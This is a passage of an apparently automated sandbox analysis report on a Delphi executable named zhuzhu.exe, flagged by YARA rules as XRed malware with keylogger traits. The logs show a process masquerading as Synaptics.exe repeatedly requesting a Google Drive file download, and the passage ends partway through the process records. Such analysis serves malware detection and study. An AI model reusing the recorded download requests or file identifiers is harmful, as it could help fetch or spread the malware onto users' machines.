                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7E62DCfIJreXVCcQ4l7mag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    145192.168.2.449951142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:48 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4CDWvYQOyVlgqZx2m9j5O0OsBbK2Lh2yXhIu0NkWEC4eSrNQsaZ7JK-tsaEK45r03iMkGiEUo
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ss4z_i2c6dAdE-eS-wHAQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:48 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:48 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 62 49 6d 76 42 6b 67 62 5f 65 7a 70 6d 5a 4f 7a 75 33 77 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="lbImvBkgb_ezpmZOzu3wqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:48 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    146192.168.2.449953142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XI2aCXThRaEkor-HilKdWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    147192.168.2.449952142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:48 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7GdMQ_1GDU9YW0PeH4Dg-MLrL-KdDH169tClcsZOrOKxxQwpPPd9XAVD40dDwz2O6S
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-579eDfgSk3tWZ5pZzvWEyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:48 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:48 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 5f 69 45 6b 35 4f 4f 42 63 4d 31 31 4b 42 73 78 6d 32 68 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="6_iEk5OOBcM11KBsxm2hrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:48 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    148192.168.2.449955142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:49 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NWqMY8td4vgJVgLBaNQyXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    149192.168.2.449956142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6lavYSCKeZOPKz9eekJVvbGN-ABVDa0KgtmX5JptBia-Tw3MYy7g3P8jWYn4rJKwTz_oQlwy4
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:49 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uffd8JR1FjutwqX9uTI8ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 47 65 44 33 6c 47 43 62 66 5a 6b 68 36 4c 4e 4a 56 42 31 4d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="HGeD3lGCbfZkh6LNJVB1MQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:22:58:57
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:6'061'056 bytes
                                                                                                                                                                    MD5 hash:675F03DB23D403573A3A6F708A0E4369
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:22:58:58
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:22:58:58
                                                                                                                                                                    Start date:29/12/2024
